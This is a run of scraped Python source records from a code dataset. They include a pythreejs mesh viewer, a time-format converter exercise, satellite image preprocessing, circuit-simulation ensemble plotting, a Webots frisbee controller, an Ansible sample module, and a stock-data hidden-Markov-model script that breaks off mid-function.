= Renderer(camera=self._cam, scene = self._scene, controls=[self._orbit], \n width=self.__s[\"width\"], height=self.__s[\"height\"], antialias=self.__s[\"antialias\"])\n\n self.__widgets = []\n self.__objects = {}\n self.__cnt = 0\n \n def __get_shading(self, shading):\n shad = {\"flat\":True, \"wireframe\":True, \"wire_width\": 0.03, \"wire_color\": \"black\",\n \"side\": 'DoubleSide', \"colormap\": \"viridis\", \"normalize\": [None, None],\n \"bbox\": False, \"roughness\": 0.5, \"metalness\": 0.25, \"reflectivity\": 1.0, \n \"line_width\": 1.0, \"line_color\": \"black\", \"point_color\": \"red\", \"point_size\": 0.01, \n \"text_color\" : \"red\"\n }\n for k in shading:\n shad[k] = shading[k]\n return shad\n \n def __update_settings(self, settings={}):\n sett = {\"width\": 600, \"height\": 600, \"antialias\": True, \"scale\": 1.5, \"background\": \"#ffffff\", \n \"fov\": 30}\n for k in settings:\n sett[k] = settings[k]\n self.__s = sett\n \n def __add_object(self, obj, parent=None):\n if not parent: # Object is added to global scene and objects dict\n self.__objects[self.__cnt] = obj\n self.__cnt += 1\n self._scene.add(obj[\"mesh\"])\n else: # Object is added to parent object and NOT to objects dict\n parent.add(obj[\"mesh\"])\n \n self.__update_view()\n return self.__cnt - 1\n \n \n def __add_line_geometry(self, lines, shading, obj=None):\n lines = lines.astype(\"float32\", copy=False)\n mi = np.min(lines, axis=0)\n ma = np.max(lines, axis=0)\n geometry = BufferGeometry(attributes={'position': BufferAttribute(lines, normalized=False)})\n material = LineBasicMaterial(linewidth=shading[\"line_width\"], color=shading[\"line_color\"])\n #, vertexColors='VertexColors'), \n lines = LineSegments(geometry=geometry, material=material) #type='LinePieces')\n line_obj = {\"geometry\": geometry, \"mesh\": lines, \"material\": material, \n \"max\": ma, \"min\": mi, \"type\": \"Lines\", \"wireframe\": None}\n \n if obj:\n return self.__add_object(line_obj, obj), line_obj\n else:\n return self.__add_object(line_obj)\n \n def __update_view(self):\n if len(self.__objects) == 0:\n return\n ma = np.zeros((len(self.__objects), 3))\n mi = np.zeros((len(self.__objects), 3))\n for r, obj in enumerate(self.__objects):\n ma[r] = self.__objects[obj][\"max\"]\n mi[r] = self.__objects[obj][\"min\"]\n ma = np.max(ma, axis=0)\n mi = np.min(mi, axis=0)\n diag = np.linalg.norm(ma-mi)\n mean = ((ma - mi) / 2 + mi).tolist()\n scale = self.__s[\"scale\"] * (diag)\n self._orbit.target = mean\n self._cam.lookAt(mean)\n self._cam.position = [mean[0], mean[1], mean[2]+scale]\n self._light.position = [mean[0], mean[1], mean[2]+scale]\n\n self._orbit.exec_three_obj_method('update')\n self._cam.exec_three_obj_method('updateProjectionMatrix')\n \n def __get_bbox(self, v):\n m = np.min(v, axis=0)\n M = np.max(v, axis=0)\n\n # Corners of the bounding box\n v_box = np.array([[m[0], m[1], m[2]], [M[0], m[1], m[2]], [M[0], M[1], m[2]], [m[0], M[1], m[2]],\n [m[0], m[1], M[2]], [M[0], m[1], M[2]], [M[0], M[1], M[2]], [m[0], M[1], M[2]]])\n\n f_box = np.array([[0, 1], [1, 2], [2, 3], [3, 0], [4, 5], [5, 6], [6, 7], [7, 4],\n [0, 4], [1, 5], [2, 6], [7, 3]], dtype=np.uint16)\n return v_box, f_box\n\n def __get_colors(self, v, f, c, sh):\n coloring = \"VertexColors\"\n if type(c) == type(None): # No color\n colors = np.ones_like(v)\n colors[:, 1] = 0.874\n colors[:, 2] = 0.0\n #print(\"No color\")\n elif type(c) == np.ndarray and c.size == 3: # Single color\n colors = np.ones_like(v)\n colors[:, 0] = c[0]\n colors[:, 1] = c[1]\n colors[:, 2] = c[2]\n #print(\"Single colors\")\n elif type(c) == np.ndarray and len(c.shape) == 2 and c.shape[1] == 3: # Color values for\n if c.shape[0] == f.shape[0]: # faces\n colors = np.hstack([c, c, c]).reshape((-1, 3))\n coloring = \"FaceColors\"\n #print(\"Face color values\")\n if c.shape[0] == v.shape[0]: # vertices\n colors = c \n #print(\"Vertex color values\")\n elif type(c) == np.ndarray and c.size == f.shape[0]: # Function values for faces\n normalize = sh[\"normalize\"][0] != None and sh[\"normalize\"][1] != None\n cc = get_colors(c, sh[\"colormap\"], normalize=normalize, \n vmin=sh[\"normalize\"][0], vmax=sh[\"normalize\"][1])\n #print(cc.shape)\n colors = np.hstack([cc, cc, cc]).reshape((-1, 3))\n coloring = \"FaceColors\"\n #print(\"Face function values\")\n elif type(c) == np.ndarray and c.size == v.shape[0]: # Function values for vertices\n normalize = sh[\"normalize\"][0] != None and sh[\"normalize\"][1] != None\n colors = get_colors(c, sh[\"colormap\"], normalize=normalize, \n vmin=sh[\"normalize\"][0], vmax=sh[\"normalize\"][1])\n #print(\"Vertex function values\")\n else:\n print(\"Invalid color array given! Supported are numpy arrays.\", type(c))\n\n return colors, coloring\n \n def add_mesh(self, v, f, c=None, uv=None, shading={}):\n sh = self.__get_shading(shading)\n mesh_obj = {}\n \n # Type adjustment vertices\n v = v.astype(\"float32\", copy=False)\n \n # Color setup \n colors, coloring = self.__get_colors(v, f, c, sh)\n \n # Type adjustment faces and colors\n c = colors.astype(\"float32\", copy=False)\n \n # Material and geometry setup\n ba_dict = {\"color\": BufferAttribute(c)}\n if coloring == \"FaceColors\":\n verts = np.zeros((f.shape[0]*3, 3), dtype=\"float32\")\n for ii in range(f.shape[0]):\n #print(ii*3, f[ii])\n verts[ii*3] = v[f[ii,0]]\n verts[ii*3+1] = v[f[ii,1]]\n verts[ii*3+2] = v[f[ii,2]]\n v = verts\n else:\n f = f.astype(\"uint16\", copy=False).ravel()\n ba_dict[\"index\"] = BufferAttribute(f, normalized=False)\n \n ba_dict[\"position\"] = BufferAttribute(v, normalized=False)\n \n if type(uv) != type(None):\n uv = (uv - np.min(uv)) / (np.max(uv) - np.min(uv))\n tex = DataTexture(data=gen_checkers(20, 20), format=\"RGBFormat\", type=\"FloatType\")\n material = MeshStandardMaterial(map=tex, reflectivity=sh[\"reflectivity\"], side=sh[\"side\"], \n roughness=sh[\"roughness\"], metalness=sh[\"metalness\"], flatShading=sh[\"flat\"],\n polygonOffset=True, polygonOffsetFactor= 1, polygonOffsetUnits=5)\n ba_dict[\"uv\"] = BufferAttribute(uv.astype(\"float32\", copy=False))\n else:\n material = MeshStandardMaterial(vertexColors=coloring, reflectivity=sh[\"reflectivity\"], \n side=sh[\"side\"], roughness=sh[\"roughness\"], metalness=sh[\"metalness\"], \n flatShading=sh[\"flat\"], \n polygonOffset=True, polygonOffsetFactor= 1, polygonOffsetUnits=5)\n\n geometry = BufferGeometry(attributes=ba_dict)\n \n if coloring == \"VertexColors\":\n geometry.exec_three_obj_method('computeVertexNormals')\n else:\n geometry.exec_three_obj_method('computeFaceNormals')\n \n # Mesh setup\n mesh = Mesh(geometry=geometry, material=material)\n \n # Wireframe setup\n mesh_obj[\"wireframe\"] = None\n if sh[\"wireframe\"]:\n wf_geometry = WireframeGeometry(mesh.geometry) # WireframeGeometry\n wf_material = LineBasicMaterial(color=sh[\"wire_color\"], linewidth=sh[\"wire_width\"])\n wireframe = LineSegments(wf_geometry, wf_material)\n mesh.add(wireframe)\n mesh_obj[\"wireframe\"] = wireframe\n \n # Bounding box setup\n if sh[\"bbox\"]:\n v_box, f_box = self.__get_bbox(v)\n _, bbox = self.add_edges(v_box, f_box, sh, mesh)\n mesh_obj[\"bbox\"] = [bbox, v_box, f_box]\n \n # Object setup\n mesh_obj[\"max\"] = np.max(v, axis=0)\n mesh_obj[\"min\"] = np.min(v, axis=0)\n mesh_obj[\"geometry\"] = geometry\n mesh_obj[\"mesh\"] = mesh\n mesh_obj[\"material\"] = material\n mesh_obj[\"type\"] = \"Mesh\"\n mesh_obj[\"shading\"] = sh\n mesh_obj[\"coloring\"] = coloring\n mesh_obj[\"arrays\"] = [v, f, c] # TODO replays with proper storage or remove if not needed\n \n return self.__add_object(mesh_obj) \n\n \n def add_lines(self, beginning, ending, shading={}, obj=None):\n sh = self.__get_shading(shading)\n lines = np.hstack([beginning, ending])\n lines = lines.reshape((-1, 3))\n return self.__add_line_geometry(lines, sh, obj)\n \n def add_edges(self, vertices, edges, shading={}, obj=None):\n sh = self.__get_shading(shading)\n lines = np.zeros((edges.size, 3))\n cnt = 0\n for e in edges:\n lines[cnt, :] = vertices[e[0]]\n lines[cnt+1, :] = vertices[e[1]]\n cnt += 2\n return self.__add_line_geometry(lines, sh, obj) \n\n def add_points(self, points, shading={}, obj=None):\n sh = self.__get_shading(shading)\n points = points.astype(\"float32\", copy=False)\n mi = np.min(points, axis=0)\n ma = np.max(points, axis=0)\n geometry = BufferGeometry(attributes={\"position\": BufferAttribute(points, normalized=False)})\n material = PointsMaterial(color=sh[\"point_color\"], size=sh[\"point_size\"])\n points = Points(geometry=geometry, material=material)\n point_obj = {\"geometry\": geometry, \"mesh\": points, \"material\": material, \n \"max\": ma, \"min\": mi, \"type\": \"Points\", \"wireframe\": None}\n \n if obj:\n return self.__add_object(point_obj, obj), point_obj\n else:\n return self.__add_object(point_obj)\n\n def remove_object(self, obj_id):\n if obj_id not in self.__objects:\n print(\"Invalid object id. Valid ids are: \", list(self.__objects.keys()))\n return\n self._scene.remove(self.__objects[obj_id][\"mesh\"])\n del self.__objects[obj_id]\n self.__update_view()\n \n def reset(self):\n for obj_id in list(self.__objects.keys()).copy():\n self._scene.remove(self.__objects[obj_id][\"mesh\"])\n del self.__objects[obj_id]\n self.__update_view()\n\n def update_object(self, oid=0, vertices=None, colors=None, faces=None):\n obj = self.__objects[oid]\n if type(vertices) != type(None):\n v = vertices.astype(\"float32\", copy=False)\n obj[\"geometry\"].attributes[\"position\"].array = v\n #self.wireframe.attributes[\"position\"].array = v # Wireframe updates?\n obj[\"geometry\"].attributes[\"position\"].needsUpdate = True\n obj[\"geometry\"].exec_three_obj_method('computeVertexNormals')\n if type(colors) != type(None):\n colors, coloring = self.__get_colors(obj[\"arrays\"][0], obj[\"arrays\"][1], colors, obj[\"shading\"])\n colors = colors.astype(\"float32\", copy=False)\n obj[\"geometry\"].attributes[\"color\"].array = colors\n obj[\"geometry\"].attributes[\"color\"].needsUpdate = True\n if type(faces) != type(None):\n if obj[\"coloring\"] == \"FaceColors\":\n print(\"Face updates are currently only possible in vertex color mode.\")\n return\n f = faces.astype(\"uint16\", copy=False).ravel()\n print(obj[\"geometry\"].attributes)\n obj[\"geometry\"].attributes[\"index\"].array = f\n #self.wireframe.attributes[\"position\"].array = v # Wireframe updates?\n obj[\"geometry\"].attributes[\"index\"].needsUpdate = True\n obj[\"geometry\"].exec_three_obj_method('computeVertexNormals')\n #self.mesh.geometry.verticesNeedUpdate = True\n #self.mesh.geometry.elementsNeedUpdate = True\n #self.update()\n \n def update(self):\n self.mesh.exec_three_obj_method('update')\n self.orbit.exec_three_obj_method('update')\n self.cam.exec_three_obj_method('updateProjectionMatrix')\n self.scene.exec_three_obj_method('update')\n\n \n def add_text(self, text, shading={}):\n self.update_shading(shading)\n tt = TextTexture(string=text, color=self.s[\"text_color\"])\n sm = SpriteMaterial(map=tt)\n self.text = Sprite(material=sm, scaleToTexture=True) \n self.scene.add(self.text)\n \n #def add_widget(self, widget, callback):\n # self.widgets.append(widget)\n # widget.observe(callback, names='value')\n\n def add_dropdown(self, options, default, desc, cb):\n widget = widgets.Dropdown(options=options, value=default, description=desc)\n self.widgets.append(widget)\n widget.observe(cb, names=\"value\")\n display(widget)\n \n def add_button(self, text, cb):\n button = widgets.Button(description=text)\n self.widgets.append(button)\n button.on_click(cb)\n display(button)\n\n def launch(self):\n display(self._renderer)\n for w in self.__widgets:\n display(w)\n\ndef plot(v, f, c=None, uv=None, shading={}, plot=None, return_plot=False):#, return_id=False):\n if not plot:\n view = Viewer(shading)\n else:\n view = plot\n view.reset()\n obj_id = view.add_mesh(v, f, c, uv=uv, shading=shading)\n if not plot:\n view.launch()\n\n #if return_plot and return_id:\n # return view, obj_id\n if return_plot:# and not return_id:\n return view\n\ndef subplot(v, f, c=None, uv=None, shading={}, s=[1, 1, 0], data=None):\n shading[\"width\"] = 400\n shading[\"height\"] = 400\n view = Viewer(shading)\n view.add_mesh(v, f, c, uv=uv, shading=shading)\n if data == None:\n rows = []\n else:\n rows = data\n if s[0] != 1 or s[1] != 1:\n if data == None: # Intialize subplot array\n cnt = 0\n for r in range(s[0]):\n row = []\n for c in range(s[1]):\n row.append(Output())\n cnt += 1\n rows.append(row)\n \n for r in rows:\n display(HBox(r))\n\n out = rows[int(s[2]/s[1])][s[2]%s[1]]\n with out:\n display(view._renderer)\n rows[int(s[2]/s[1])][s[2]%s[1]] = view\n if data == None:\n return rows\n","sub_path":"tutorial/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":16661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"165294947","text":"def time_converter(time):\n if time == \"00:00\":\n return \"12:00 a.m.\"\n t = time.split(\":\")\n res = \"\"\n if int(t[0]) > 12:\n res += str(int(t[0]) % (12 + 1) + 1)\n else:\n res += str(int(t[0]))\n res += \":\"\n res += t[1]\n res += \" \"\n if int(t[0]) > 11:\n res += \"p.m.\"\n else:\n res += \"a.m.\"\n #print(res)\n return res\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(time_converter('12:30'))\n\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert time_converter('12:30') == '12:30 p.m.'\n assert time_converter('09:00') == '9:00 a.m.'\n assert time_converter('23:15') == '11:15 p.m.'\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n","sub_path":"Home/Time Converter (24h to 12h)/mission.py","file_name":"mission.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"541777125","text":"############################################################\r\n# This file is for to preprocess images from Planet Lab #\r\n# to convert them from 4 bands to 3 bands and crop them to #\r\n# a fixed size #\r\n############################################################\r\n\r\nimport json\r\nimport numpy as np\r\nimport sys\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nimport os\r\nfrom collections import defaultdict \r\n\r\nprint('Start Processing')\r\ndef process_mask(masks_dir, masks_out):\r\n masks_filenames = [f for f in os.listdir(masks_dir)]\r\n for mask in masks_filenames:\r\n image_id = mask.split('.')[0] #get image ID\r\n im_name = image_id + '.png'\r\n mask_image = Image.open(masks_dir + im_name)\r\n mask_image.load()\r\n background = mask_image.crop((0, 0, cut_size, cut_size)) \r\n # save mask\r\n overlay_path = masks_out + image_id + '.png'\r\n background.save(overlay_path, 'png', quality=100)\r\n \r\ndef process_image(imgs_dir, imgs_out):\r\n imgs_filenames = [f for f in os.listdir(imgs_dir)]\r\n for img_file in imgs_filenames:\r\n image_id = img_file.split('.')[0] #get image ID\r\n im_name = image_id + '.tif'\r\n rgba_image = Image.open(imgs_dir + im_name)\r\n #turn to RGB\r\n rgba_image.load()\r\n background = Image.new(\"RGB\", rgba_image.size, (255, 255, 255))\r\n background.paste(rgba_image, mask = rgba_image.split()[3])\r\n #crop to a unanimous size\r\n background = background.crop((0, 0, cut_size, cut_size)) \r\n #save image\r\n overlay_path = imgs_out + image_id + '.jpeg'\r\n background.save(overlay_path, 'JPEG', quality=100)\r\n\r\n\r\nimgs_dir = 'data/imgs_planet/'\r\nmasks_dir = 'data/masks_planet/'\r\nimgs_out = 'data/imgs/'\r\nmasks_out = 'data/masks/'\r\ncut_size = 467\r\n\r\n# comment out the function if don't want to process the images or the masks \r\nprocess_image(imgs_dir, imgs_out)\r\nprocess_mask(masks_dir, masks_out)\r\n \r\n","sub_path":"train_preprocess.py","file_name":"train_preprocess.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"362110967","text":"#! /usr/bin/env python\n\nimport sys\nimport yaml\nimport argparse\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport qucstools.qucs.netlist as netlist\nimport qucstools.qucs.generators as generators\nimport qucstools.qucs.simulator as simulator\n\nimport qucstools.extensions.arg as apext\n\n\ndef main(argv=sys.argv):\n # parse arguments\n parser = argparse.ArgumentParser(\n description=\"Plot function ensembles out of randomized netlists\",\n epilog=\"Montecarlo analysis with Qucs\"\n )\n parser.add_argument(\n 'netlist', metavar=\"NETLIST\", type=argparse.FileType('r'),\n action=apext.make_custom_action(netlist.load),\n help=\"Netlist to be used\"\n )\n parser.add_argument(\n 'setup', metavar=\"SETUP\", type=argparse.FileType('r'),\n action=apext.make_custom_action(yaml.load),\n help=\"Analysis setup\"\n )\n args = parser.parse_args(argv)\n\n # randomize components\n generated_netlists = generators.randomize(\n args.netlist, **args.setup['randomization']\n )\n\n # simulate netlists\n datasets = simulator.simulate(\n generated_netlists, **args.setup['simulation']\n )\n\n # plot observations\n for observation in args.setup['observations']:\n function_name = observation['function']\n variable_name = observation['variable']\n\n # get base domain values\n base_dataset = datasets[0]\n base_function = base_dataset[function_name]\n base_variable = np.unique(base_function.domain[variable_name])\n points = np.repeat(\n base_function.domain[0], (base_variable.shape[0], 1)\n )\n points[variable_name] = base_variable\n\n # plot ensemble\n plt.figure()\n plt.hold(True)\n plt.title(\n \"Ensemble for {} = f({})\".format(function_name, variable_name))\n for dataset in datasets:\n plt.semilogx(points, np.abs(dataset[function_name](points)))\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"qucstools/tools/qensemble.py","file_name":"qensemble.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"393884667","text":"from distutils.core import setup\nimport os\n\ndef getfile(fname):\n return open(os.path.join(os.path.dirname(__file__), fname))\n\nreadme = getfile('README.txt').read()\n\nsetup(name='fpath',\n version='0.6',\n description='Filesystem paths as objects',\n author='Wendell',\n author_email='wackywendell@gmail.com',\n py_modules=['fpath'],\n classifiers=[ # available at http://pypi.python.org/pypi?%3Aaction=list_classifiers\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: System :: Filesystems',\n 'Operating System :: POSIX',\n 'Operating System :: Microsoft',\n 'License :: OSI Approved :: MIT License'\n ],\n license='MIT',\n long_description=readme\n )\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"287513796","text":"\"\"\"frisbee_flight controller.\"\"\"\n\n# importing the Supervisor module\nfrom controller import Robot\nfrom controller import Supervisor\nimport numpy as np\n\n# create the Supervisor instance.\nsupervisor = Supervisor()\n\n# get the time step of the current world.\ntimestep = int(supervisor.getBasicTimeStep())\nprint(timestep)\n\n# instantiate object handles for the frisbee\nfrisbee_node = supervisor.getFromDef(\"test_frisbee\")\ntrans_field = frisbee_node.getField(\"translation\")\nrotation_field = frisbee_node.getField(\"rotation\")\n\n# import the frisbee simulation data\ndata = np.genfromtxt(\"trajectory.csv\", delimiter=',')\nposition_data = data[:,0:3]\nrotation_data = np.genfromtxt(\"rotations.csv\", delimiter=',')\n\ntime_index = 0\nread = False\n# Main loop:\n# - perform simulation steps until Webots is stopping the controller\nwhile supervisor.step(timestep) != -1:\n # this is done repeatedly\n try:\n if read:\n # update the position and rotation of the frisbee\n position = position_data[time_index,:].tolist()\n trans_field.setSFVec3f(position)\n \n rotation = rotation_data[time_index,:].tolist()\n rotation_field.setSFRotation(rotation)\n \n time_index += 1\n except(IndexError):\n print(\"End of trajectory file reached\")\n read = False\n pass\n\n\n\n# Enter here exit cleanup code.\n","sub_path":"183DASimul/controllers/frisbee_controller/___/frisbee_controller_old.py","file_name":"frisbee_controller_old.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"34043519","text":"#!/usr/bin/env python\nfrom ansible.module_utils.basic import *\n\nclass Linux(object):\n\tplatform = 'Generic'\n\tdistribution = None\n \n\tdef __new__(cls, *args, **kwargs):\n\t\treturn load_platform_subclass(Linux, args, kwargs)\n \n\tdef name(self):\n\t\treturn self.distribution if self.distribution else self.platform\n\nclass Debian(Linux):\n\tplatform = 'Linux'\n\tdistribution = 'Debian'\n\nclass OSX(Linux):\n\tplatform = 'Darwin'\n\tdistribution = None\n\nmodule = AnsibleModule(\n\targument_spec = dict(\n\t\tcommand = dict(required=True)\n\t)\n)\nmodule.log(\"start\")\nlinux = Linux()\n\ncommand = module.params['command']\nrc, stdout, stderr = module.run_command(command)\nmodule.exit_json(\n\tchanged=True,\n\trc=rc,\n\tstdout=stdout,\n\tstderr=stderr, msg=linux.name()\n)\nmodule.log(\"end\")\n","sub_path":"ansible/library/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"589058478","text":"import collections\nimport string\n\n\nclass StringGenerator:\n\n letters = string.ascii_letters\n first_letter = letters[0]\n last_letter = letters[-1]\n _codes = collections.defaultdict(str)\n\n @classmethod\n def increase_letter(cls, letter):\n if letter == cls.last_letter:\n return cls.first_letter\n\n index = cls.letters.index(letter)\n return cls.letters[index + 1]\n\n @classmethod\n def increase_code(cls, code):\n \"\"\"\n\n >>> StringGenerator.increase_code('c')\n 'd'\n >>> StringGenerator.increase_code('b')\n 'c'\n >>> StringGenerator.increase_code('z')\n 'A'\n >>> StringGenerator.increase_code('aZ')\n 'ba'\n >>> StringGenerator.increase_code('ZZ')\n 'aaa'\n\n :param code: string code, that contains only letters.\n :return:\n \"\"\"\n reverse_code = list(code[::-1])\n\n for idx, letter in enumerate(reverse_code):\n new_letter = cls.increase_letter(letter)\n reverse_code[idx] = new_letter\n\n if new_letter != cls.first_letter:\n break\n else:\n reverse_code += cls.first_letter\n return ''.join(reverse_code[::-1])\n\n @classmethod\n def next(cls, prefix):\n \"\"\"Returns next letter added to string gathered from prefix.\n\n >>> StringGenerator.next('prefix1')\n 'a'\n >>> StringGenerator.next('prefix1')\n 'b'\n >>> StringGenerator.next('prefix1')\n 'c'\n >>> StringGenerator.next('prefix2')\n 'a'\n >>> StringGenerator.next('prefix2')\n 'b'\n >>> StringGenerator.next('prefix1')\n 'd'\n\n When generator get to 'z', next return will be 'aa'.\n\n :param prefix: unique string\n :return: new code\n \"\"\"\n if prefix not in cls._codes:\n cls._codes[prefix] = cls.first_letter\n else:\n cls._codes[prefix] = cls.increase_code(cls._codes[prefix])\n\n return cls._codes[prefix]\n\n @classmethod\n def delete(cls, prefix):\n \"\"\"Removes code in current prefix.\n\n :param prefix:\n :return:\n \"\"\"\n cls._codes.pop(prefix, None)\n\n @classmethod\n def clear(cls):\n cls._codes.clear()\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"diskcollections/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"211122723","text":"\n#client = MongoClient()\n#database = client['okcoindb']\n#collection = database['historical_data']\n\n# Retrieve price, v_ask, and v_bid data points from the database.\n\nimport pandas as pd\nimport yfinance as yf\nimport time\nfrom pandas_datareader import data as pdr\n\n\nyf.pdr_override() \n\nimport math \nimport numpy as np\n#import matplotlib.pyplot as plt\n#import seaborn as sns\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom tqdm import tqdm\nimport statistics\nimport numpy as np\nfrom numpy.linalg import norm\nfrom sklearn import linear_model\nfrom sklearn.cluster import KMeans\n\nimport statsmodels.api as sm\nfrom scipy import stats\nfrom matplotlib import cm, pyplot as plt\nfrom hmmlearn.hmm import GaussianHMM\nimport scipy\nimport datetime\nimport json\nimport seaborn as sns\nfrom sklearn.externals import joblib\nimport ta\n\n\nimport xgboost\nfrom xgboost import XGBRegressor\nfrom sklearn.model_selection import train_test_split\nimport os\nimport matplotlib.pyplot as plt\nplt.rcParams[\"figure.figsize\"] = (12,8)\nfrom sklearn import metrics, model_selection\nfrom xgboost.sklearn import XGBClassifier\n\n\n#client = MongoClient()\n#database = client['okcoindb']\n#collection = database['historical_data']\n\n# Retrieve price, v_ask, and v_bid data points from the database.\n\nimport pandas as pd\nimport yfinance as yf\nimport time\nfrom pandas_datareader import data as pdr\nfrom scipy.signal import argrelextrema\n\n\nyf.pdr_override() \n\nimport math \nimport numpy as np\n#import matplotlib.pyplot as plt\n#import seaborn as sns\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom tqdm import tqdm\nimport statistics\nimport numpy as np\nfrom numpy.linalg import norm\nfrom sklearn import linear_model\nfrom sklearn.cluster import KMeans\n\nimport statsmodels.api as sm\nfrom scipy import stats\nfrom matplotlib import cm, pyplot as plt\nfrom hmmlearn.hmm import GaussianHMM\nimport scipy\nimport datetime\nimport json\nimport seaborn as sns\nfrom sklearn.externals import joblib\nimport ta\n\n\n#import xgboost\n#from xgboost import XGBRegressor\nfrom sklearn.model_selection import train_test_split\nimport os\n#import matplotlib.pyplot as plt\n#plt.rcParams[\"figure.figsize\"] = (12,8)\nfrom sklearn import metrics, model_selection\n#from xgboost.sklearn import XGBClassifier\n\n# DO THE REST OF JAN HAVE TO DELETE ROW\n\n\n#client = MongoClient()\n#database = client['okcoindb']\n#collection = database['historical_data']\n\n# Retrieve price, v_ask, and v_bid data points from the database.\n\nimport pandas as pd\nimport yfinance as yf\nimport time\nfrom pandas_datareader import data as pdr\n\n\nyf.pdr_override() \n\nimport math \nimport numpy as np\n#import matplotlib.pyplot as plt\n#import seaborn as sns\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom tqdm import tqdm\nimport statistics\nimport numpy as np\nfrom numpy.linalg import norm\nfrom sklearn import linear_model\nfrom sklearn.cluster import KMeans\n\nimport statsmodels.api as sm\nfrom scipy import stats\nfrom matplotlib import cm, pyplot as plt\nfrom hmmlearn.hmm import GaussianHMM\nimport scipy\nimport datetime\nimport json\nimport seaborn as sns\nfrom sklearn.externals import joblib\nimport ta\n\n\n\nticker = [\n# S AND P 500\n\n'ROST',\t\n'RCL',\n'SPGI',\t\n'CRM',\n'SBAC',\t\n'SLB',\t\n'STX',\t\n'SEE',\t\n'SRE',\t\n'NOW',\t\n'SHW',\t\n'SPG',\t\n'SWKS',\t\n'SLG',\n'SNA',\t\n'SO',\t\n'LUV',\t\n'SWK',\t\n'SBUX',\t\n'STT',\t\n'STE',\t\n'SYK',\t\n'SIVB',\t\n'SYF',\t\n'SNPS',\t\t\n'SYY',\n'TMUS',\t\t\n'TROW',\t\n'TTWO',\t\n'TPR',\n'TGT',\n'TEL',\t\n'FTI',\t\n'TFX',\n'TXN',\t\n'TXT',\t\n'TMO',\t\n'TIF',\t\t\n'TJX',\t\n'TSCO',\n'TDG',\t\n'TRV',\t\n'TWTR',\t\n'TSN',\t\n'UDR',\t\n'ULTA',\t\n'USB',\n'UAA',\t\t\t\n'UA',\t\n'UNP',\t\n'UAL',\t\n'UNH',\t\n'UPS',\t\n'URI',\t\t\n'UTX',\t\n'UHS',\t\n'UNM',\t\n'VFC',\t\n'VLO',\n'VAR',\t\n'VTR',\n'VRSN',\t\n'VRSK',\n'VZ',\t\n'V',\n'VNO',\t \n'VMC',\t\n'WRB',\t\n'WAB',\t\n'WMT',\t\n'WBA',\t\n'DIS',\t\n'WM',\t\n'WAT',\t\n'WEC',\t\n'WFC',\t\n'WELL',\n'WDC',\n'WU',\t\n'W',\n'WY',\t\t\n'WHR',\t\n'WMB',\t\n'WLTW',\t\n'WYNN',\t\n'XEL',\n'XRX',\t\n'XLNX',\n'XYL',\n'YUM',\t\n'ZBRA',\t\n'ZBH',\t\n'ZION',\t\n'ZTS',\n\n]\n\n\ndef get_best_hmm_model(X, max_states, max_iter = 10000):\n best_score = -(10 ** 10)\n best_state = 0\n \n for state in range(1, max_states + 1):\n hmm_model = GaussianHMM(n_components = state, random_state = 100,\n covariance_type = \"diag\", n_iter = max_iter).fit(X)\n if hmm_model.score(X) > best_score:\n best_score = hmm_model.score(X)\n best_state = state\n \n best_model = GaussianHMM(n_components = best_state, random_state = 100,\n covariance_type = \"diag\", n_iter = max_iter).fit(X)\n return best_model\n\n# Normalized st. deviation\ndef std_normalized(vals):\n return np.std(vals) / np.mean(vals)\n\n# Ratio of diff between last price and mean value to last price\ndef ma_ratio(vals):\n return (vals[-1] - np.mean(vals)) / vals[-1]\n\n# z-score for volumes and price\ndef values_deviation(vals):\n return (vals[-1] - np.mean(vals)) / np.std(vals)\n\n# General plots of hidden states\ndef plot_hidden_states(hmm_model, data, X, column_price):\n plt.figure(figsize=(15, 15))\n fig, axs = plt.subplots(hmm_model.n_components, 3, figsize = (15, 15))\n colours = cm.prism(np.linspace(0, 1, hmm_model.n_components))\n hidden_states = model.predict(X)\n \n for i, (ax, colour) in enumerate(zip(axs, colours)):\n mask = hidden_states == i\n ax[0].plot(data.index, data[column_price], c = 'grey')\n ax[0].plot(data.index[mask], data[column_price][mask], '.', c = colour)\n ax[0].set_title(\"{0}th hidden state\".format(i))\n ax[0].grid(True)\n \n ax[1].hist(data[\"future_return\"][mask], bins = 30)\n ax[1].set_xlim([-0.1, 0.1])\n ax[1].set_title(\"future return distrbution at {0}th hidden state\".format(i))\n ax[1].grid(True)\n \n ax[2].plot(data[\"future_return\"][mask].cumsum(), c = colour)\n ax[2].set_title(\"cummulative future return at {0}th hidden state\".format(i))\n ax[2].grid(True)\n \n 